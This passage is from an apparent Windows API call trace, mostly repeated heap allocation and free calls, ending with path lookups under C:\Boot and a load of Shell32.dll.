| out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.787] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.787] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.788] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.788] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.789] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.789] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.790] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.790] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.791] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.791] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.792] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.792] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.792] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.792] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.794] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.794] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.795] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.795] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.796] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.796] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.796] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.796] PathFindFileNameW (pszPath="") returned="" [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.796] LoadLibraryW (lpLibFileName="Shell32.dll") returned 